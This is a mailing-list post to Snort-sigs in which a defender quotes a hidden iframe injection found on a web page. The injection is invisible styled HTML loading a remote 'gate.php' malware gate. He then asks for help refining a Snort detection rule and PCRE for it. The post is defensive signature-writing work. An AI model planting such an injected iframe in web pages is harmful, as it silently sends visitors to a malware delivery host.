Rule thought

[James Lay <jlay () slave-tothe-box net>]

All,

Recently (today) I ran into the below:

<!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div
 
class=pofasdfhg><iframe src=http://analitics3.in/gate.php?f=1003673   
frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 
border=0></iframe></div><!--/qpi-->

I've not seen an iframe injection that included a specified class 
before.  My original draft rule looked like:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any 
(msg:"INDICATOR-COMPROMISE div class iframe in page"; file_data; 
pcre:"/<\/style><div class=[a-z]{9}><iframe src/i"; 
classtype:web-application-attack; sid:10000017; rev:1;)

But this looks pretty expensive.  I'm sure there's a better way to 
match this...would it be something like:

content:"</style><div"; pcre:"/class=[a-z]{9}>/"; content:"<iframe 
src";

My question is how do I tell Snort to match all three consecutively?  I 
get that I could use within, but would that apply to the pcre?  Thanks 
for any advice.

James

------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!